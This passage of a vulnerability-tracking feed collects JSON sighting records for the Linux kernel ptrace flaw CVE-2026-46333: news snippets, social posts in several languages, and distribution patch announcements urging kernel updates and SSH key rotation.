"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3mme5n32ldx22", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path", "creation_timestamp": "2026-05-21T09:54:32.090306Z"}, {"uuid": "e1b5c119-4cc8-4f81-839e-f53ab737b742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://thehackernews.com/2026/05/9-year-old-linux-kernel-flaw-enables.html", "content": "Cybersecurity researchers have disclosed details of a vulnerability in the Linux kernel that remained undetected for nine years.\n\nThe vulnerability, tracked as CVE-2026-46333 (CVSS score: 5.5), is a case of improper privilege management that could permit an unprivileged local user to disclose sensitive files and execute arbitrary commands as root on default installations of several major", 
"creation_timestamp": "2026-05-21T05:35:53.000000Z"}, {"uuid": "3bb662a7-72d1-40e6-8cea-71f9b621bbcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmefcrbdn2y2", "content": "Nine-year-old Linux Kernel Vulnerability Let Attackers Exfiltrate SSH Private Keys A newly disclosed Linux kernel vulnerability, tracked as CVE-2026-46333, exposes a serious local privilege escalat...\n\n#Cyber #Security #News #Linux #Vulnerability #News [\u2026] \n\n[Original post on cybersecuritynews.com]", "creation_timestamp": "2026-05-21T12:12:01.204782Z"}, {"uuid": "d30cb28d-008b-483c-9f76-918f0524766e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/postac001.bsky.social/post/3mmefeedwn523", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e9\u5e74\u9593\u672a\u691c\u51fa\u306e\u8106\u5f31\u6027(CVE-2026-46333)\u306b\u3088\u308a\u3001\u7279\u6a29\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304croot\u6a29\u9650\u3067\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u53ef\u80fd\u3002", "creation_timestamp": "2026-05-21T12:12:49.850998Z"}, {"uuid": "15018486-524a-487f-a6e5-54b2ceb5deb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/appinn.bsky.social/post/3mmem7jjypv2y", "content": "\u8fd9\u662f\u4eca\u5929\uff082026\u5e745\u670821\u65e5\uff09\u65e9\u4e0a\uff1a \u8fd9\u662f\u4eca\u5929\u665a\u4e0a\uff1a \u4e5f\u4e0d\u77e5\u9053\u8bf4\u4ec0\u4e48\u4e86\uff0c\u76f4\u63a5\u770b\u5427\u3002 Linux \u7b2c4\u6f0f\u6d1e\uff1aCVE-2026-46333\uff087.1\u5206\uff09 
\u8fd9\u662f\u7ee7 Copy Fail\uff084 \u6708 29 \u65e5\uff09\u3001Dirty Frag\uff085 \u6708 7 \u65e5\uff09\u548c Fragnesia\uff085 \u6708 13", "creation_timestamp": "2026-05-21T14:15:23.541269Z"}, {"uuid": "5449f6b7-7c45-4c96-8879-c9c56ee7a7e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mmeqcuniaju2", "content": "CVE-2026-46333: Linux Kernel Flaw Grants Root via ssh-keysign Qualys disclosed CVE-2026-46333, a nine-year-old Linux privilege escalation flaw that gives local users a reliable path to root on Debi...\n\n#Resources #CVE #Vulnerability #Alerts [\u2026] \n\n[Original post on dailysecurityreview.com]", "creation_timestamp": "2026-05-21T15:28:56.016260Z"}, {"uuid": "48617c39-e751-45fc-a44d-9c0d6bbf5547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmf5iibufo22", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Vulnerabilities #and #Threat #Research #security #vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-21T19:24:50.583323Z"}, {"uuid": "bc9c314a-7613-44c5-9f20-adf31ffac7af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://www.cert.dk/news/2026-05-22/Gammel-Linux-fejl-giver-lokal-root-adgang", "content": "", "creation_timestamp": "2026-05-22T00:22:03.000000Z"}, {"uuid": "bddba5ee-da6a-45e8-9b7d-e8a471fece22", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/rspinternetgroup.bsky.social/post/3mmfrfk7r4c2t", "content": "\u3010\u304a\u77e5\u3089\u305b\u3011[RisuPu] Linux\u30ab\u30fc\u30cd\u30eb\u306b\u304a\u3051\u308b\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u306e\u8907\u6570\u306e\u8106\u5f31\u6027\uff08CVE-2026-46300\uff0fCVE-2026-46333\uff09\u306b\u95a2\u3059\u308b\u5bfe\u5fdc\u306b\u3064\u3044\u3066\nrspig.jp/notice/fragn...", "creation_timestamp": "2026-05-22T01:23:06.445224Z"}, {"uuid": "d4e9e752-7617-4963-a8c8-27f2cd709c57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mmg56svosc2g", "content": "9-Year-Old Linux Kernel Flaw Enables Root Command Execution on Major Distros\n\nCybersecurity researchers have disclosed details of a vulnerability in the Linux kernel that remained undetected for nine years.\n\nThe vulnerability, tracked as CVE-2026-46333 (CVSS score: 5.5), is a case\u2026\n#hackernews #news", "creation_timestamp": "2026-05-22T04:51:53.303110Z"}, {"uuid": "c16c9851-4642-45ce-ad0f-723f9049da37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "Telegram/eGNnV304XEqDFAANRXhi1HE7X9MoKYAjwKK0DWUVMn_blw", "content": "", "creation_timestamp": "2026-05-21T12:29:26.000000Z"}, {"uuid": "7ecc3ac9-5c9b-4c22-8461-dcef919b9af0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-46333", "type": "seen", "source": "https://bsky.app/profile/raptor.infosec.exchange.ap.brid.gy/post/3mmexv3kq4ix2", 
"content": "#Qualys #Security #Advisory\n\nLogic bug in the #Linux kernel's __ptrace_may_access() function\n(CVE-2026-46333)\n\nhttps://cdn2.qualys.com/advisory/2026/05/20/cve-2026-46333-ptrace.txt", "creation_timestamp": "2026-05-21T17:44:28.337920Z"}, {"uuid": "eaba4af3-7c5c-4a3d-87b0-f002cea62e61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-46333", "type": "seen", "source": "https://bsky.app/profile/kubonai.bsky.social/post/3mmf2e4h5zo2u", "content": "CVE-2026-46333: Linux Kernel ptrace Race Condition Allows Local Information D...\n\nCVE-2026-46333 (ssh-keysign-pwn) is a Linux kernel race condition in ptrace's exit path. It allows unpr...\n\n\ud83d\udd17 https://ipsec.live/blog/2026-05-21-cve-2026-46333-linux-kernel-ptrace-race\n\n#infosec #cybersecurity", "creation_timestamp": "2026-05-21T18:28:29.531605Z"}, {"uuid": "96acc9fa-4b34-4c1d-a6ed-2af366c84517", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mmf2qo373kc2", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Vulnerabilities #and #Threat #Research #security #vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-21T18:35:42.252793Z"}, {"uuid": "e18ecb53-36d2-4924-83ff-28f812ce2795", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/calculito.bsky.social/post/3mmgxbdvqn32y", "content": "\ud83d\udd34 Qualys flagged a local logic flaw in the Linux 
kernel (CVE-2026-46333), potentially letting unprivileged users mess with memory access. Just another day in the world of cybersecurity where the gaps keep showing up. #LinuxFlaw #mikronews", "creation_timestamp": "2026-05-22T12:38:34.987597Z"}, {"uuid": "de9aadc5-04de-45c4-94f4-bf4578c2e864", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmhh7sxp2sl2", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Vulnerabilities #and #Threat #Research #security #vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-22T17:24:04.939101Z"}, {"uuid": "2b162fd8-4a19-4c1c-a8b4-7c9dba2afd72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/almalinux.org/post/3mmhkc55lud24", "content": "CVE-2026-46333 patches are live for AlmaLinux 8, 9 &amp; 10. \n\nCommunity testing pushed them from testing \u2192 production faster than we could've managed alone. Get the patched kernels now if you haven't already! 
almalinux.org/blog/2026-05...", "creation_timestamp": "2026-05-22T18:19:06.339053Z"}, {"uuid": "42e8c844-00f2-49e7-a5f6-4dc69329dc9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mmhsvh2fts32", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Vulnerabilities #and #Threat #Research #security #vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-22T20:53:08.346831Z"}, {"uuid": "49349a61-e29e-42c3-9289-8148b341e1bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/insomnisec.bsky.social/post/3mmhvklxchw2i", "content": "\ud83d\udce1 DirtyDecrypt (CVE-2026-31635) and ssh-keysign-pwn (CVE-2026-46333): Sorting Out May's Linux LPE Pair", "creation_timestamp": "2026-05-22T21:40:37.752805Z"}, {"uuid": "0dda4a5f-ced9-4ee9-9940-c9522773b686", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyqvvbua2x", "content": "\ud83d\udd17 CVE : CVE-2025-21999, CVE-2025-38024, CVE-2025-71238, CVE-2026-23191, CVE-2026-23243, CVE-2026-23401, CVE-2026-31419, CVE-2026-31532, CVE-2026-43284, CVE-2026-46300, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:12.537893Z"}, {"uuid": "50aa2c20-5133-44da-84a1-41dfec3ac142", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 
"vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyr4kgoa2u", "content": "\ud83d\udd17 CVE : CVE-2025-54518, CVE-2026-43284, CVE-2026-43500, CVE-2026-46300, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:18.717283Z"}, {"uuid": "b07d2294-0a1f-46ea-8a3b-f9df1d489f76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyri3mmq2x", "content": "\ud83d\udd17 CVE : CVE-2026-31499, CVE-2026-43088, CVE-2026-43109, CVE-2026-43220, CVE-2026-43490, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:30.987237Z"}, {"uuid": "e2fdd9a4-37f6-4df0-bdcd-37e0542fe4ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyzqwfpo2k", "content": "\ud83d\udd17 CVE : CVE-2026-46333", "creation_timestamp": "2026-05-22T13:10:07.643278Z"}, {"uuid": "14649b53-d0d3-4abb-bd5d-890b8b228260", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63jtyfc2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. 
Right now.", "creation_timestamp": "2026-05-22T14:40:36.053413Z"}, {"uuid": "0c2e7326-18d4-40ab-9636-e3f16b9ed2e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63jub6k2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:36.602683Z"}, {"uuid": "c9f53249-6e69-4c92-8369-a0e107b59362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63juc5s2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:37.242928Z"}, {"uuid": "e126ff6e-2417-4dae-a682-5c3eb258d378", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63jud522k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. 
Right now.", "creation_timestamp": "2026-05-22T14:40:37.904350Z"}, {"uuid": "e49736fa-bbd9-4fcc-b96d-e5cafa6eb3a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63juf3k2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:38.455380Z"}, {"uuid": "86592e85-afc4-4fb0-95b2-266bbda16065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63jug2s2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:39.000503Z"}, {"uuid": "894f8ffc-9dad-4b15-8683-29edc968b14c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63juh222k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. 
Right now.", "creation_timestamp": "2026-05-22T14:40:39.539793Z"}, {"uuid": "33f2f4cd-7e44-4c9f-b2e6-b85aa188df92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63juh232k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:40.110289Z"}, {"uuid": "d4a7e87d-c5cc-40bc-b2ab-236007e5803d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63juhzd2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. 
Right now.", "creation_timestamp": "2026-05-22T14:40:40.709167Z"}, {"uuid": "144fd36a-2d07-4609-9fa0-f2ee6151d92d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmifqkvtg52v", "content": "Top 3 CVE for last 7 days:\nCVE-2026-45584: 64 interactions\nCVE-2026-45250: 63 interactions\nCVE-2026-46333: 28 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46333: 13 interactions\nCVE-2026-31431: 6 interactions\nCVE-2026-39821: 6 interactions\n", "creation_timestamp": "2026-05-23T02:31:25.478309Z"}, {"uuid": "c2a6fc06-a633-4364-abba-4d64f55ed0c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "Cve-2026-46333", "type": "seen", "source": "https://bsky.app/profile/mineabot.xyz/post/3mmhwngrmjb2s", "content": "Cve-2026-46333 details a logic bug found in the Linux kernel\u2019s __ptrace_may_access() function. This impacts debugging capabilities and could potentially allow privilege escalation. Patches are rolling out now; system administrators should review...\n\n#devops #linux #sre", "creation_timestamp": "2026-05-22T22:00:07.183710Z"}, {"uuid": "f51ced41-fc1f-4fc3-af16-96fe99a438f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://gist.github.com/ichintu/5cc436746984e120454764f225990464", "content": "**Key take\u2011aways**\n\n**Microsoft \u2013 Active Exploitation of Defender Vulnerabilities**  \n- CVE\u20112026\u201141091 &amp; CVE\u20112026\u201145498 in the Defender ecosystem are being actively exploited.  \n- Both issues carry CVSS scores (exact values can be found in the article).  
\n- Published\u202fMay\u202f22\u202f2026; full article includes a link, plus additional CVEs referenced:  \n  CVE\u20112026\u201120223, CVE\u20112026\u201145584, CVE\u20112026\u201145829, CVE\u20112026\u20115140, CVE\u20112026\u201133825, CVE\u20112010\u20110806, CVE\u20112010\u20110249, CVE\u20112009\u20113459, CVE\u20112009\u20111537, CVE\u20112008\u20114250.  \n\n**Microsoft \u2013 Temporary Script for Windows\u202fBitLocker Leak**  \n- Vulnerability allows a physically\u2011present attacker to read encrypted data.  \n- CVE\u20112026\u201145585.  \n- Microsoft released a script that blocks the data leak.  \n- Publication\u202fMay\u202f22\u202f2026 (approx. 2\u202fh\u202f19\u202fmin ago).  \n\n**Linux \u2013 Local Attackers Steal SSH Keys &amp; Run Root Code**  \n- CVE\u20112026\u201146333 enables local attackers to exfiltrate SSH keys and execute code with root privileges.  \n- Patches and mitigations are available; administrators urged to deploy promptly.  \n- Published\u202fMay\u202f22\u202f2026 (\u2248\u202f2\u202fh\u202f40\u202fmin ago).  \n- CVE details at: https://cvefeed.io/vuln/detail/CVE-2026-46333  \n\n**Cisco Secure Workload \u2013 CVE\u20112026\u201120223**  \n- Critical flaw with a CVSS rating of 10.0; affects the Secure Workload platform.  \n- Cisco has issued a patch.  \n- Publication\u202fMay\u202f22\u202f2026.  \n- Related CVE\u20112026\u20115140 also mentioned.  \n\n**INJ3CTOR3 \u2013 Advanced FreePBX Attacks**  \n- Campaign uses the JOMANGY webshell; attributed with high confidence to threat actor INJ3CTOR.  \n- Publication\u202fMay\u202f22\u202f2026 (\u2248\u202f3\u202fh\u202f28\u202fmin ago).  \n- Highlights vulnerabilities exploited in the attacks.  \n\n**CVE\u20112026\u201125606 \u2013 SQL Injection in STER**  \n- Improper input sanitization in STER\u2019s search filters allows authenticated attackers to inject SQL and exfiltrate data.  \n- Severity: 8.7 (HIGH).  \n- Fixed in version\u202f9.5.  \n- Published\u202fMay\u202f22\u202f2026.  
\n\n**AI Strategy in OT \u2013 Lessons from the Field**  \n- Legacy Windows\u202f7 laptops remain the sole link to industrial control systems, lacking patches or EDR.  \n- Dragos data: &lt;10\u202f% of OT networks have meaningful monitoring; in 30\u202f% of incidents investigation begins with a floor\u2011level alert.  \n- AI fails when it never receives real OT telemetry; the CIA triangle is inverted\u2014availability is paramount.  \n- Passive network monitoring is essential; active polling risks crashing legacy controllers.  \n- Focus on \u201ccrown jewel\u201d processes (the three processes a plant cannot afford to lose for an hour) instead of blanket AI rollouts.  \n- Recommendations: inventory physical floor, segment the network, collect passive Level\u202f0\u20112 telemetry, then overlay AI.  \n\n**Kimwolf DDoS Botnet \u2013 Canadian Arrest**  \n- DOJ announced arrest of a Canadian citizen allegedly operating the Kimwolf DDoS botnet.  \n- Individual: Jacob Butler (aka \u201cDort\u201d), 23, Ottawa, Canada.  
\n- Charged with developing and operating the botnet; Kimwolf identified as a variant of AISURU.", "creation_timestamp": "2026-05-22T12:00:42.000000Z"}, {"uuid": "35bc095e-ea5e-4f7a-ad78-9a266d50fd17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mml5xohpk572", "content": "Oracle Linux 9 Kernel Important ptrace Issue ELSA-2026-50280 CVE-2026-46333 The following updated rpms for Oracle Linux 9 have been uploaded to the Unbreakable Linux Network:\n\n#Oracle #Linux #Distribution #- #Security #Advisories\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-24T04:49:08.352050Z"}, {"uuid": "82b9eb77-81ac-41b2-af78-8282c99c3742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://mastodon.social/users/knoppix95/statuses/116628399794111630", "content": "Researchers disclosed CVE-2026-46333, a Linux kernel flaw present since 2016 that enables local users to access sensitive files and execute commands as root. \ud83d\udc27Qualys said Debian, Fedora and Ubuntu default installs are affected, while admins are urged to patch kernels and rotate exposed SSH keys. 
\ud83d\udd11\n\ud83d\udd17 https://thehackernews.com/2026/05/9-year-old-linux-kernel-flaw-enables.html\n#TechNews #Linux #Kernel #CVE202646333 #CVE #Cybersecurity #Qualys #Ubuntu #Debian #Fedora #OpenSource #FOSS #Security #Exploit #Infosec #SysAdmin #Privacy #SSH #Admin", "creation_timestamp": "2026-05-24T07:38:02.535708Z"}, {"uuid": "c85b172e-cf15-4cdd-ba7c-7b4c34d2e645", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/technology-news.bsky.social/post/3mmiqk7l24s2m", "content": "CVE-2026-46333 is a nine-year Linux kernel improper privilege management flaw introduced in November 2016 with a CVSS score of 5.5.", "creation_timestamp": "2026-05-23T05:43:37.072611Z"}, {"uuid": "9705d66b-ac94-4c5f-b82f-48d790535860", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-46338", "type": "published-proof-of-concept", "source": "https://github.com/facelessuser/pymdown-extensions/security/advisories/GHSA-62q4-447f-wv8h", "content": "", "creation_timestamp": "2026-05-13T22:22:58.000000Z"}, {"uuid": "5469c4e6-46f0-4ee0-8a9c-22342b1e6658", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmjp7ulgujz2", "content": "\u0412 Linux \u0431\u0435\u0448\u0435 \u043e\u0442\u043a\u0440\u0438\u0442\u0430 \u043f\u043e\u0440\u0435\u0434\u043d\u0430\u0442\u0430 \u0441\u0435\u0440\u0438\u043e\u0437\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442 \u2013 \u0442\u044f \u0441\u044a\u0449\u0435\u0441\u0442\u0432\u0443\u0432\u0430 \u043e\u0442 \u0446\u0435\u043b\u0438 10 \u0433\u043e\u0434\u0438\u043d\u0438 \u0412 Linux 
